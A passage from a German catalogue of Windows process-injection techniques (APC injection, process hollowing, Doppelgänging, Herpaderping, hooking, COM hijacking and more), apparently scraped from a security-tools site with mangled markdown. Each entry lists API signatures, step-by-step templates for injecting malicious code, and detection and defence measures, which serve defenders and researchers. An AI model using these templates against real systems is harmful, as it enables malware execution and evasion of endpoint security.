  • Verarbeite die Relocation-Tabelle:
    • Zähle Relocation-Einträge auf
    • Wende Relocations basierend auf der neuen Basisadresse an
  • Löse Imports auf:
    • Durchlaufe das Import-Verzeichnis
    • Löse für jede importierte Funktion deren Adresse mithilfe von GetProcAddress auf
    • Schreibe die aufgelösten Adressen in die IAT
  1. Führe den Einstiegspunkt der DLL mithilfe einer der Thread-Erstellungsmethoden aus

Erkennung und Abwehr:

  • Implementiere erweiterte Speicherscan-Techniken, um injizierten Code zu erkennen
  • Verwende verhaltensbasierte Erkennung, um verdächtige Speicherreservierungsmuster zu identifizieren
  • Überwache auf ungewöhnliche Datei-Mapping-Operationen
  • Setze heuristische Erkennungsmethoden ein, um Reflective Loader zu identifizieren

4. APC-Injektion

Diese Technik ermöglicht die Codeausführung in einem bestimmten Thread, indem sie sich an eine Warteschlange für asynchrone Prozeduraufrufe (APC) anhängt. Funktioniert am besten mit alertable Threads (solchen, die unterbrechbare Wartefunktionen aufrufen).

Wichtige APIs:

  • CreateToolhelp32Snapshot ```c HANDLE CreateToolhelp32Snapshot( DWORD dwFlags, DWORD th32ProcessID );
    root@kitploit:~
  • Process32First ```c BOOL Process32First( HANDLE hSnapshot, LPPROCESSENTRY32 lppe );
    root@kitploit:~
  • Process32Next ```c BOOL Process32Next( HANDLE hSnapshot, LPPROCESSENTRY32 lppe );
    root@kitploit:~

Thread32First ```c BOOL Thread32First( HANDLE hSnapshot, LPTHREADENTRY32 lpte );

root@kitploit:~
[`Thread32Next`](https://docs.microsoft.com/en-us/windows/win32/api/tlhelp32/nf-tlhelp32-thread32next)  ```c
BOOL Thread32Next(
  HANDLE          hSnapshot,
  LPTHREADENTRY32 lpte
);
  • QueueUserAPC ```c DWORD QueueUserAPC( PAPCFUNC pfnAPC, HANDLE hThread, ULONG_PTR dwData );
    root@kitploit:~
  • KeInitializeAPC (Kernelmodus, undokumentiert) ```c VOID KeInitializeApc( PRKAPC Apc, PRKTHREAD Thread, KAPC_ENVIRONMENT Environment, PKKERNEL_ROUTINE KernelRoutine, PKRUNDOWN_ROUTINE RundownRoutine, PKNORMAL_ROUTINE NormalRoutine, KPROCESSOR_MODE ProcessorMode, PVOID NormalContext );
    root@kitploit:~

Vorlage:

  1. Erstellen Sie eine Momentaufnahme der Systemprozesse mit CreateToolhelp32Snapshot
  2. Zählen Sie Prozesse und Threads mithilfe von Process32First, Process32Next, Thread32First und Thread32Next auf
  3. Öffnen Sie den Zielprozess mit OpenProcess
  4. Reservieren Sie Speicher im Zielprozess mit VirtualAllocEx
  5. Schreiben Sie den schädlichen Code mit WriteProcessMemory in den reservierten Speicher
  6. Reihen Sie eine APC mit QueueUserAPC in den Ziel-Thread ein, die auf den injizierten Code verweist

Erkennung und Abwehr:

  • Überwachen Sie auf verdächtige APC-Warteschlangenoperationen
  • Implementieren Sie eine Thread-Ausführungsüberwachung, um unerwartete Codeausführung zu erkennen
  • Setzen Sie EDR-Lösungen mit Fähigkeiten zur Erkennung von APC-Missbrauch ein
  • Nutzen Sie Laufzeitanalyse, um ungewöhnliches Thread-Verhalten zu identifizieren

5. Process Hollowing (Prozessersetzung)

Diese Technik "leert" den gesamten Inhalt eines Prozesses aus und fügt schädlichen Inhalt in ihn ein.

Wichtige APIs:

  • CreateProcess ```c BOOL CreateProcessA( LPCSTR lpApplicationName, LPSTR lpCommandLine, LPSECURITY_ATTRIBUTES lpProcessAttributes, LPSECURITY_ATTRIBUTES lpThreadAttributes, BOOL bInheritHandles, DWORD dwCreationFlags, LPVOID lpEnvironment, LPCSTR lpCurrentDirectory, LPSTARTUPINFOA lpStartupInfo, LPPROCESS_INFORMATION lpProcessInformation );
    root@kitploit:~
  • NtQueryInformationProcess (Undokumentiert) ```c NTSTATUS NTAPI NtQueryInformationProcess( IN HANDLE ProcessHandle, IN PROCESSINFOCLASS ProcessInformationClass, OUT PVOID ProcessInformation, IN ULONG ProcessInformationLength, OUT PULONG ReturnLength OPTIONAL );
    root@kitploit:~

GetModuleHandle ```c HMODULE GetModuleHandleA( LPCSTR lpModuleName );

root@kitploit:~
- `ZwUnmapViewOfSection` / `NtUnmapViewOfSection` (Undokumentiert)  ```c
NTSTATUS NTAPI NtUnmapViewOfSection(
  IN HANDLE ProcessHandle,
  IN PVOID BaseAddress
);
  • VirtualAllocEx (siehe oben)
  • WriteProcessMemory (siehe oben)
  • GetThreadContext ```c BOOL GetThreadContext( HANDLE hThread, LPCONTEXT lpContext );
    root@kitploit:~
  • SetThreadContext (siehe oben)
  • ResumeThread (siehe oben)

Vorlage:

  1. Erstellen Sie einen neuen Prozess in einem angehaltenen Zustand mit CreateProcess und dem Flag CREATE_SUSPENDED
  2. Rufen Sie die Prozessinformationen mit NtQueryInformationProcess ab
  3. Entfernen Sie die ursprüngliche ausführbare Datei aus dem Prozess mithilfe von NtUnmapViewOfSection; nach dem Entfernen der ursprünglichen ausführbaren Datei passen Sie die Image-Basisadresse im PEB (Process Environment Block) an, sodass sie auf den neu zugewiesenen Speicher zeigt.
  4. Passen Sie die Image-Basisadresse im PEB an:
  • Verwenden Sie ReadProcessMemory, um den PEB zu lesen
  • Suchen Sie das Feld ImageBaseAddress
  • Verwenden Sie WriteProcessMemory, um es mit der Adresse des neu zugewiesenen Speichers zu aktualisieren
  1. Weisen Sie im Zielprozess mit VirtualAllocEx Speicher zu
  2. Schreiben Sie die schädliche ausführbare Datei mit WriteProcessMemory in den zugewiesenen Speicher
  3. Aktualisieren Sie den Thread-Kontext, sodass er auf den neuen Einstiegspunkt zeigt, mithilfe von GetThreadContext und SetThreadContext
  4. Setzen Sie den Hauptthread des Prozesses mit ResumeThread fort

Erkennung und Abwehr:

  • Implementieren Sie Prozessintegritätsprüfungen, um ausgehöhlte Prozesse zu erkennen
  • Überwachen Sie verdächtige Prozesserstellungsmuster, insbesondere mit dem Flag CREATE_SUSPENDED
  • Verwenden Sie Speicherforensik-Tools, um Anzeichen von Prozess-Hollowing zu erkennen
  • Setzen Sie verhaltensbasierte Erkennung ein, um Prozesse mit unerwarteten Speicherlayouts zu identifizieren

6. AtomBombing

Eine Variante der APC-Injection, die funktioniert, indem sie die schädliche Nutzlast in separate Zeichenfolgen aufteilt und Atome verwendet. Diese Technik beruht auf der Tatsache, dass Atome prozessübergreifend gemeinsam genutzt werden.

Wichtige APIs:

  • OpenThread (siehe oben)
  • GlobalAddAtom ```c ATOM GlobalAddAtomA( LPCSTR lpString );
    root@kitploit:~
  • GlobalGetAtomName ```c UINT GlobalGetAtomNameA( ATOM nAtom, LPSTR lpBuffer, int nSize );
    root@kitploit:~
  • QueueUserAPC (siehe oben)
  • NtQueueApcThread (Undokumentiert, siehe oben)
  • NtSetContextThread (Undokumentiert) ```c NTSTATUS NTAPI NtSetContextThread( IN HANDLE ThreadHandle, IN PCONTEXT ThreadContext );
    root@kitploit:~

Vorlage:

  1. Teile die schädliche Nutzlast in kleine Blöcke auf
  2. Für jeden Block verwende GlobalAddAtom, um ein globales Atom zu erstellen
  3. Öffne den Zielthread mit OpenThread
  4. Stelle einen APC für den Zielthread mit QueueUserAPC oder NtQueueApcThread in die Warteschlange
  5. Verwende in der APC-Routine GlobalGetAtomName, um die Nutzlastblöcke abzurufen
  6. Setze die Nutzlast im Speicher des Zielprozesses zusammen
  7. Führe die Nutzlast mit NtSetContextThread aus oder indem du einen weiteren APC in die Warteschlange stellst

Erkennung und Abwehr:

  • Überwache auf ungewöhnliche Muster bei der Erstellung und dem Abruf von Atomen
  • Implementiere verhaltensbasierte Erkennung für Prozesse, die auf eine große Anzahl von Atomen zugreifen
  • Verwende EDR-Lösungen mit Fähigkeiten zur Erkennung von AtomBombing-Techniken
  • Setze Laufzeitanalyse ein, um verdächtige APC-Nutzung in Kombination mit Atom-Manipulation zu identifizieren

7. Process Doppelgänging

Eine Weiterentwicklung des Process Hollowing, die das Image ersetzt, bevor der Prozess erstellt wird. Diese Technik nutzt das Windows Transactional NTFS (TxF), um während der Prozesserstellung vorübergehend eine legitime Datei durch eine schädliche zu ersetzen.

Wichtige APIs:

  • CreateTransaction ```c HANDLE CreateTransaction( LPSECURITY_ATTRIBUTES lpTransactionAttributes, LPGUID UOW, DWORD CreateOptions, DWORD IsolationLevel, DWORD IsolationFlags, DWORD Timeout, LPWSTR Description );
    root@kitploit:~
  • CreateFileTransacted ```c HANDLE CreateFileTransactedA( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile, HANDLE hTransaction, PUSHORT pusMiniVersion, PVOID lpExtendedParameter );
    root@kitploit:~
  • NtCreateSection (Undokumentiert) ```c NTSTATUS NTAPI NtCreateSection( OUT PHANDLE SectionHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN PLARGE_INTEGER MaximumSize OPTIONAL, IN ULONG SectionPageProtection, IN ULONG AllocationAttributes, IN HANDLE FileHandle OPTIONAL );
    root@kitploit:~
  • NtCreateProcessEx (Undokumentiert) ```c NTSTATUS NTAPI NtCreateProcessEx( OUT PHANDLE ProcessHandle, IN ACCESS_MASK DesiredAccess, IN POBJECT_ATTRIBUTES ObjectAttributes OPTIONAL, IN HANDLE ParentProcess, IN ULONG Flags, IN HANDLE SectionHandle OPTIONAL, IN HANDLE DebugPort OPTIONAL, IN HANDLE ExceptionPort OPTIONAL, IN BOOLEAN InJob );
    root@kitploit:~

Vorlage:

  1. Erstellen Sie eine Transaktion mit CreateTransaction
  2. Erstellen Sie eine transaktionale Datei mit CreateFileTransacted
  3. Schreiben Sie die schädliche Nutzlast in die transaktionale Datei
  4. Erstellen Sie eine Section für die transaktionale Datei mit NtCreateSection
  5. Erstellen Sie einen Prozess aus der Section mit NtCreateProcessEx
  6. Erstellen Sie einen Thread im neuen Prozess mit NtCreateThreadEx
  7. Führen Sie den Rollback der Transaktion mit RollbackTransaction durch, um Spuren der schädlichen Datei zu entfernen

Erkennung und Abwehr:

  • Überwachen Sie verdächtige transaktionale NTFS-Vorgänge
  • Implementieren Sie eine Dateiintegritätsüberwachung, um die temporäre Ersetzung von Dateien zu erkennen
  • Setzen Sie fortschrittliche EDR-Lösungen ein, die Process-Doppelgänging-Techniken erkennen können
  • Nutzen Sie verhaltensbasierte Erkennung, um Prozesse zu identifizieren, die aus transaktionalen Dateien erstellt wurden

8. Process Herpaderping

Ähnlich wie Process Doppelgänging nutzt diese Technik die Reihenfolge von Prozesserstellung und Sicherheitsprüfungen aus. Sie macht sich die Tatsache zunutze, dass Windows Sicherheitsprüfungen an der ausführbaren Datei durchführt, bevor es mit der Ausführung des Prozesses beginnt.

Wichtige APIs:

  • CreateFile ```c HANDLE CreateFileA( LPCSTR lpFileName, DWORD dwDesiredAccess, DWORD dwShareMode, LPSECURITY_ATTRIBUTES lpSecurityAttributes, DWORD dwCreationDisposition, DWORD dwFlagsAndAttributes, HANDLE hTemplateFile );
    root@kitploit:~
  • NtCreateSection (Undokumentiert, siehe oben)
  • NtCreateProcessEx (Undokumentiert, siehe oben)
  • NtCreateThreadEx (Undokumentiert, siehe oben)

Template:

  1. Erstellen Sie eine Datei mit CreateFile
  2. Schreiben Sie die schädliche Nutzlast in die Datei
  3. Erstellen Sie eine Section für die Datei mit NtCreateSection
  4. Überschreiben Sie den Dateiinhalt mit harmlosen Daten
  5. Erstellen Sie einen Prozess aus der Section mit NtCreateProcessEx
  6. Erstellen Sie einen Thread im neuen Prozess mit NtCreateThreadEx

Erkennung und Abwehr:

  • Implementieren Sie Dateiintegritätsüberwachung, um schnelle Änderungen an ausführbaren Dateien zu erkennen
  • Verwenden Sie verhaltensbasierte Erkennung, um Prozesse mit nicht übereinstimmenden Dateiinhalten zu identifizieren
  • Setzen Sie fortschrittliche EDR-Lösungen ein, die Process-Herpaderping-Techniken erkennen können
  • Überwachen Sie auf verdächtige Muster bei Dateierstellung, -änderung und Prozesserstellung

9. Hooking-Injektion

Diese Technik verwendet Hooking-bezogene Funktionen, um eine schädliche DLL zu injizieren. Diese Technik kann auch für API-Hooking verwendet werden, nicht nur für Injektion.

Wichtige APIs:

  • SetWindowsHookEx ```c HHOOK SetWindowsHookExA( int idHook, HOOKPROC lpfn, HINSTANCE hmod, DWORD dwThreadId );
    root@kitploit:~

PostThreadMessage ```c BOOL PostThreadMessageA( DWORD idThread, UINT Msg, WPARAM wParam, LPARAM lParam );

root@kitploit:~
Vorlage:
1. Erstellen Sie eine DLL, die die Hook-Prozedur enthält
2. Verwenden Sie `SetWindowsHookEx`, um einen Hook im Zielprozess zu setzen
3. Lösen Sie den Hook aus, indem Sie eine Nachricht mit `PostThreadMessage` senden

Erkennung und Abwehr:
- Überwachen Sie verdächtige Verwendung von `SetWindowsHookEx`, insbesondere bei globalen Hooks
- Implementieren Sie Erkennungsmechanismen für API-Hooking
- Verwenden Sie EDR-Lösungen mit der Fähigkeit, abnormale Hook-Installationen zu erkennen
- Setzen Sie verhaltensbasierte Erkennung ein, um Prozesse mit unerwartet geladenen Modulen zu identifizieren

## 10. Extra Windows Memory Injection

Diese Technik injiziert Code in einen Prozess, indem sie den Extra Windows Memory (EWM) verwendet, der während der Fensterklassenregistrierung an die Instanz einer Klasse angehängt wird. Sie ist weniger verbreitet und könnte von einigen Sicherheitslösungen erkannt werden.

Wichtige APIs:
- [`FindWindowA`](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-findwindowa)  ```c
HWND FindWindowA(
  LPCSTR lpClassName,
  LPCSTR lpWindowName
);

GetWindowThreadProcessId ```c DWORD GetWindowThreadProcessId( HWND hWnd, LPDWORD lpdwProcessId );

root@kitploit:~
- `OpenProcess` (siehe oben)
- `VirtualAllocEx` (siehe oben)
- `WriteProcessMemory` (siehe oben)
- [`SetWindowLongPtrA`](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-setwindowlongptra)  ```c
LONG_PTR SetWindowLongPtrA(
  HWND     hWnd,
  int      nIndex,
  LONG_PTR dwNewLong
);
  • SendNotifyMessage ```c BOOL SendNotifyMessageA( HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam );
    root@kitploit:~

Vorlage:

  1. Finden Sie das Zielfenster mit FindWindowA
  2. Ermitteln Sie die Prozess-ID des Fensters mit GetWindowThreadProcessId
  3. Öffnen Sie den Prozess mit OpenProcess
  4. Weisen Sie dem Zielprozess mit VirtualAllocEx Speicher zu
  5. Schreiben Sie den schädlichen Code mit WriteProcessMemory in den zugewiesenen Speicher
  6. Verwenden Sie SetWindowLongPtrA, um den zusätzlichen Speicher des Fensters zu ändern
  7. Lösen Sie die Ausführung mit SendNotifyMessage aus

Erkennung und Abwehr:

  • Überwachen Sie auf verdächtige Änderungen an Fenstereigenschaften
  • Implementieren Sie Integritätsprüfungen für Fensterklassendaten
  • Verwenden Sie EDR-Lösungen mit Fähigkeiten zur Erkennung von EWM-Manipulationen
  • Setzen Sie verhaltensbasierte Erkennung ein, um Prozesse mit unerwarteten Änderungen an Fenstereigenschaften zu identifizieren

11. Propagate Injection

Diese Technik wird verwendet, um schädlichen Code in Prozesse mit mittlerer Integritätsstufe zu injizieren, wie z. B. explorer.exe. Sie funktioniert durch das Aufzählen von Fenstern und deren Subclassing. Sie kann besonders effektiv für die Privilegienausweitung sein.

Wichtige APIs:

  • EnumWindows ```c BOOL EnumWindows( WNDENUMPROC lpEnumFunc, LPARAM lParam );
    root@kitploit:~

EnumChildWindows ```c BOOL EnumChildWindows( HWND hWndParent, WNDENUMPROC lpEnumFunc, LPARAM lParam );

root@kitploit:~
- [`EnumProps`](https://docs.microsoft.com/en-us/windows/win32/api/winuser/nf-winuser-enumpropa)  ```c
int EnumPropsA(
  HWND      hWnd,
  PROPENUMPROCA lpEnumFunc
);
  • GetProp ```c HANDLE GetPropA( HWND hWnd, LPCSTR lpString );
    root@kitploit:~
  • SetWindowSubclass ```c BOOL SetWindowSubclass( HWND hWnd, SUBCLASSPROC pfnSubclass, UINT_PTR uIdSubclass, DWORD_PTR dwRefData );
    root@kitploit:~
  • FindWindow (siehe oben)
  • FindWindowEx (siehe oben)
  • GetWindowThreadProcessId (siehe oben)
  • OpenProcess (siehe oben)
  • ReadProcessMemory (siehe oben)
  • VirtualAllocEx (siehe oben)
  • WriteProcessMemory (siehe oben)
  • ```c BOOL SetPropA( HWND hWnd, LPCSTR lpString, HANDLE hData );

PostMessage ```c BOOL PostMessageA( HWND hWnd, UINT Msg, WPARAM wParam, LPARAM lParam );

root@kitploit:~
Vorlage:
1. Fenster mit `EnumWindows` und `EnumChildWindows` auflisten
2. Für jedes Fenster mit `EnumProps` und `GetProp` auf subklassierte Fenster prüfen
3. Den Zielprozess mit `OpenProcess` öffnen
4. Speicher im Zielprozess mit `VirtualAllocEx` reservieren
5. Den schädlichen Code mit `WriteProcessMemory` in den reservierten Speicher schreiben
6. Das Fenster mit `SetWindowSubclass` subclassen
7. Eine neue Eigenschaft mit `SetPropA` festlegen, um die Payload zu speichern
8. Die Ausführung durch Senden einer Nachricht mit `PostMessage` auslösen

Erkennung und Abwehr:
- Auf verdächtige Muster bei der Fensterenumeration und beim Subclassing achten
- Integritätsprüfungen für das Fenster-Subclassing implementieren
- EDR-Lösungen mit Fähigkeiten zur Erkennung sich ausbreitender Injektionstechniken verwenden
- Verhaltensbasierte Erkennung einsetzen, um Prozesse mit unerwarteten Änderungen beim Fenster-Subclassing zu identifizieren

## 12. Heap Spray

Obwohl es sich streng genommen nicht um eine Injektionstechnik handelt, wird Heap-Spraying häufig zusammen mit anderen Injektionsmethoden eingesetzt, um die Auslieferung von Exploit-Payloads zu erleichtern. Moderne Browser und Betriebssysteme haben Schutzmaßnahmen dagegen implementiert.

Wichtige APIs:
- [`HeapAlloc`](https://docs.microsoft.com/en-us/windows/win32/api/heapapi/nf-heapapi-heapalloc)  ```c
LPVOID HeapAlloc(
  HANDLE hHeap,
  DWORD  dwFlags,
  SIZE_T dwBytes
);
  • VirtualAlloc ```c LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
    root@kitploit:~

Template:

  1. Weisen Sie mehrere Speicherblöcke mit HeapAlloc oder VirtualAlloc zu
  2. Füllen Sie diese Blöcke mit einer Kombination aus NOP-Sleds und dem Payload
  3. Wiederholen Sie diesen Vorgang, um einen großen Teil des Adressraums des Prozesses abzudecken

Erkennung und Abwehr:

  • Implementieren Sie eine Überwachung der Speicherzuweisung, um verdächtige Muster zu erkennen
  • Nutzen Sie Address Space Layout Randomization (ASLR), um Heap-Spraying-Angriffe zu entschärfen
  • Setzen Sie EDR-Lösungen ein, die Techniken des Heap-Sprayings erkennen können
  • Implementieren Sie browserspezifische Gegenmaßnahmen, wie etwa die Randomisierung der Heap-Zuweisung

13. Thread Execution Hijacking

Diese Technik beinhaltet das Anhalten eines legitimen Threads in einem Zielprozess, das Ändern seines Ausführungskontexts, sodass er auf schädlichen Code zeigt, und das anschließende Fortsetzen des Threads. Das Speichern und Wiederherstellen des ursprünglichen Thread-Kontexts ist erforderlich, um die Prozessstabilität zu erhalten.

Wichtige APIs:

  • OpenThread (siehe oben)
  • SuspendThread (siehe oben)
  • GetThreadContext (siehe oben)
  • SetThreadContext (siehe oben)
  • VirtualAllocEx (siehe oben)
  • WriteProcessMemory (siehe oben)
  • ResumeThread (siehe oben)

Template:

  1. Öffnen Sie den Zielthread mit OpenThread
  2. Setzen Sie den Thread mit SuspendThread aus
  3. Rufen Sie den Thread-Kontext mit GetThreadContext ab
  4. Weisen Sie im Zielprozess Speicher mit VirtualAllocEx zu
  5. Schreiben Sie den schädlichen Code mit WriteProcessMemory in den zugewiesenen Speicher
  6. Ändern Sie den Thread-Kontext mit SetThreadContext, sodass er auf den injizierten Code zeigt
  7. Setzen Sie den Thread mit ResumeThread fort

Erkennung und Abwehr:

  • Überwachen Sie verdächtige Muster von Thread-Aussetzung und -Fortsetzung
  • Implementieren Sie eine Überwachung der Thread-Ausführung, um unerwartete Änderungen im Ausführungsablauf zu erkennen
  • Setzen Sie EDR-Lösungen ein, die Thread-Hijacking-Techniken erkennen können
  • Nutzen Sie Laufzeitanalysen, um ungewöhnliches Thread-Verhalten zu identifizieren

14. Module Stomping

Diese Technik überschreibt den Speicher eines legitimen Moduls im Zielprozess mit schädlichem Code und umgeht dadurch möglicherweise einige Sicherheitsprüfungen. Die Erkennung erfolgt durch Integritätsprüfungen geladener Module.

Wichtige APIs:

  • GetModuleInformation ```c BOOL GetModuleInformation( HANDLE hProcess, HMODULE hModule, LPMODULEINFO lpmodinfo, DWORD cb );
    root@kitploit:~
  • VirtualProtectEx ```c BOOL VirtualProtectEx( HANDLE hProcess, LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
    root@kitploit:~
  • WriteProcessMemory (siehe oben)

Vorlage:

  1. Öffnen Sie den Zielprozess mit OpenProcess
  2. Rufen Sie Informationen über das Zielmodul mit GetModuleInformation ab
  3. Ändern Sie den Speicherschutz des Moduls mit VirtualProtectEx auf beschreibbar
  4. Überschreiben Sie den Codeabschnitt des Moduls mit schädlichem Code mithilfe von WriteProcessMemory
  5. Stellen Sie den ursprünglichen Speicherschutz mit VirtualProtectEx wieder her

Erkennung und Abwehr:

  • Implementieren Sie Integritätsprüfungen für Module, um Änderungen an geladenen Modulen zu erkennen
  • Verwenden Sie EDR-Lösungen mit Funktionen zur Erkennung von Modul-Stomping-Techniken
  • Setzen Sie Speicherforensik-Tools ein, um Anzeichen von Modul-Stomping zu identifizieren
  • Implementieren Sie Codesignatur- und Verifizierungsmechanismen für geladene Module

15. IAT Hooking

Diese Technik modifiziert die Import Address Table (IAT) eines Prozesses, um Funktionsaufrufe auf schädlichen Code umzuleiten. Erkennbar ist sie durch den Vergleich der IAT-Einträge mit den tatsächlichen Funktionsadressen in den Ziel-DLLs.

Wichtige APIs:

  • GetProcAddress ```c FARPROC GetProcAddress( HMODULE hModule, LPCSTR lpProcName );
    root@kitploit:~
  • VirtualProtect ```c BOOL VirtualProtect( LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
    root@kitploit:~

Vorlage:

  1. Lokalisiere die IAT des Zielprozesses
  2. Identifiziere die zu hookende Funktion
  3. Ändere den Speicherschutz der IAT mit VirtualProtect auf beschreibbar
  4. Ersetze die ursprüngliche Funktionsadresse durch die Adresse der schädlichen Funktion
  • Berechne die Adresse des IAT-Eintrags für die Zielfunktion
  • Lies die ursprüngliche Funktionsadresse aus dem IAT-Eintrag
  • Ersetze die ursprüngliche Funktionsadresse durch die Adresse der schädlichen Funktion
  1. Stelle den ursprünglichen Speicherschutz wieder her

Erkennung und Abwehr:

  • Implementiere IAT-Integritätsprüfungen, um Änderungen zu erkennen
  • Verwende EDR-Lösungen mit Fähigkeiten zur Erkennung von IAT-Hooking
  • Setze Laufzeitanalyse ein, um unerwartete Funktionsumleitungen zu identifizieren
  • Implementiere Code-Signierung und Verifizierungsmechanismen für geladene Module

16. Inline-Hooking

Diese Technik verändert die ersten Befehle einer Funktion, um die Ausführung auf schädlichen Code umzuleiten, erfordert jedoch eine sorgfältige Handhabung von Multibyte-Befehlen und relativen Sprüngen.

Wichtige APIs:

  • VirtualProtect (siehe oben)
  • memcpy ```c void *memcpy( void *dest, const void *src, size_t count );
    root@kitploit:~

Vorlage:

  1. Ziel-Funktion im Speicher lokalisieren
  2. Den Speicherschutz mithilfe von VirtualProtect auf beschreibbar ändern
  3. Die ursprünglichen Anweisungen speichern (normalerweise 5 oder mehr Bytes)
  4. Den Funktionsanfang mit einem Sprung zum schädlichen Code überschreiben
  5. Im schädlichen Code die gespeicherten ursprünglichen Anweisungen ausführen und dann zur ursprünglichen Funktion zurückspringen

Erkennung und Abwehr:

  • Funktionsintegritätsprüfungen implementieren, um Änderungen an Funktionsprologen zu erkennen
  • EDR-Lösungen mit Erkennungsfunktionen für Inline-Hooking einsetzen
  • Laufzeitanalyse einsetzen, um unerwartete Änderungen im Ausführungsfluss von Funktionen zu identifizieren
  • Code-Signierung und Verifizierungsmechanismen für geladene Module implementieren

17. Debugger-Injektion

Diese Technik verwendet Debugging-APIs, um Code in einen Zielprozess zu injizieren. kann durch Anti-Debugging-Prüfungen im Zielprozess erkannt werden.

Wichtige APIs:

  • DebugActiveProcess ```c BOOL DebugActiveProcess( DWORD dwProcessId );
    root@kitploit:~
  • WaitForDebugEvent ```c BOOL WaitForDebugEvent( LPDEBUG_EVENT lpDebugEvent, DWORD dwMilliseconds );
    root@kitploit:~

ContinueDebugEvent ```c BOOL ContinueDebugEvent( DWORD dwProcessId, DWORD dwThreadId, DWORD dwContinueStatus );

root@kitploit:~
Template:
1. An den Zielprozess als Debugger mit `DebugActiveProcess` anhängen
2. Mit `WaitForDebugEvent` auf Debug-Ereignisse warten
3. Wenn ein geeignetes Ereignis eintritt, den schädlichen Code mit `WriteProcessMemory` injizieren
4. Den Thread-Kontext ändern, um den injizierten Code auszuführen
5. Das Debug-Ereignis mit `ContinueDebugEvent` fortsetzen

Erkennung und Abwehr:
- Anti-Debugging-Techniken in sicherheitskritischen Anwendungen implementieren
- Verdächtige Nutzung von Debugging-APIs überwachen
- EDR-Lösungen einsetzen, die debuggerbasierte Injektion erkennen können
- Laufzeitanalyse einsetzen, um unerwartete Debug-Ereignisse zu identifizieren

## 18. COM-Hijacking

Diese Technik ersetzt legitime COM-Objekte durch schädliche, um Code auszuführen, wenn das COM-Objekt instanziiert wird. Sie wird für Persistenz verwendet, nicht nur für Injektion.

Wichtige APIs:
- [`CoCreateInstance`](https://docs.microsoft.com/en-us/windows/win32/api/combaseapi/nf-combaseapi-cocreateinstance)  ```c
HRESULT CoCreateInstance(
  REFCLSID rclsid,
  LPUNKNOWN pUnkOuter,
  DWORD dwClsContext,
  REFIID riid,
  LPVOID *ppv
);
  • RegOverridePredefKey ```c LSTATUS RegOverridePredefKey( HKEY hKey, HKEY hNewHKey );
    root@kitploit:~

Vorlage:

  1. Erstellen Sie ein schädliches COM-Objekt
  2. Ändern Sie die Registrierung, um die CLSID eines legitimen COM-Objekts durch das schädliche zu ersetzen
  3. Wenn die Anwendung CoCreateInstance aufruft, wird stattdessen das schädliche Objekt instanziiert

Erkennung und Abwehr:

  • Implementieren Sie Integritätsprüfungen für COM-Objekte
  • Überwachen Sie verdächtige Registrierungsänderungen im Zusammenhang mit COM-Objekten
  • Verwenden Sie Anwendungs-Whitelisting, um das Laden nicht autorisierter COM-Objekte zu verhindern
  • Setzen Sie verhaltensbasierte Erkennung ein, um unerwartete COM-Objekt-Instanziierung zu identifizieren

19. Phantom DLL Hollowing

Diese Technik umfasst das Erstellen eines neuen Abschnitts in einer legitimen DLL und das Injizieren von Code in diesen.

Wichtige APIs:

  • LoadLibraryEx ```c HMODULE LoadLibraryExA( LPCSTR lpLibFileName, HANDLE hFile, DWORD dwFlags );
    root@kitploit:~
  • VirtualAlloc ```c LPVOID VirtualAlloc( LPVOID lpAddress, SIZE_T dwSize, DWORD flAllocationType, DWORD flProtect );
    root@kitploit:~
  • VirtualProtect ```c BOOL VirtualProtect( LPVOID lpAddress, SIZE_T dwSize, DWORD flNewProtect, PDWORD lpflOldProtect );
    root@kitploit:~

Vorlage:

  1. Lade eine legitime DLL mithilfe von LoadLibraryEx mit dem Flag DONT_RESOLVE_DLL_REFERENCES
  2. Allokiere einen neuen Speicherabschnitt mithilfe von VirtualAlloc
  3. Kopiere den schädlichen Code in den neuen Abschnitt
  4. Ändere die PE-Header der DLL, um den neuen Abschnitt aufzunehmen
  5. Ändere den Speicherschutz des neuen Abschnitts mithilfe von VirtualProtect
  6. Führe den injizierten Code aus

Erkennung und Abwehr:

  • Implementiere DLL-Integritätsprüfungen, um Modifikationen zu erkennen
  • Überwache auf verdächtige Muster von DLL-Ladevorgängen und Speicherzuweisungen
  • Verwende EDR-Lösungen mit Fähigkeiten zur Erkennung von Phantom-DLL-Hollowing
  • Setze Speicher-Forensik-Tools ein, um Anzeichen von DLL-Manipulation zu identifizieren

20. PROPagate

Diese Technik missbraucht die Windows-API-Funktionen SetProp/GetProp, um Codeausführung zu erreichen.

Wichtige APIs:

  • SetProp ```c BOOL SetPropA( HWND hWnd, LPCSTR lpString, HANDLE hData );
    root@kitploit:~
  • GetProp ```c HANDLE GetPropA( HWND hWnd, LPCSTR lpString );
    root@kitploit:~

EnumPropsEx ```c int EnumPropsExW( HWND hWnd, PROPENUMPROCEXW lpEnumFunc, LPARAM lParam );

root@kitploit:~
Vorgehen:
1. Finde ein Zielfenster mithilfe von `FindWindow` oder `EnumWindows`
2. Allokiere Speicher für die Payload mithilfe von `VirtualAllocEx`
3. Schreibe die Payload mit `WriteProcessMemory` in den allokierten Speicher
4. Verwende `SetProp`, um eine Eigenschaft am Fenster zu setzen, wobei die Payload-Adresse als Eigenschaftswert dient
- Erstelle eine benutzerdefinierte Fensterprozedur, die die Payload ausführt
- Verwende `SetWindowLongPtr`, um die ursprüngliche Fensterprozedur durch die benutzerdefinierte zu ersetzen
6. Löse die Ausführung aus, indem du das Fenster dazu bringst, seine Eigenschaften aufzulisten (z. B. durch Senden einer Nachricht, die ein Neuzeichnen verursacht)

Erkennung und Abwehr:
- Überwache auf verdächtige Änderungen an Fenstereigenschaften
- Implementiere Integritätsprüfungen für Fenstereigenschaften
- Nutze EDR-Lösungen mit Fähigkeiten zur Erkennung von PROPagate-Techniken
- Setze verhaltensbasierte Erkennung ein, um Prozesse mit unerwarteten Änderungen an Fenstereigenschaften zu identifizieren

## 21. Early Bird Injection

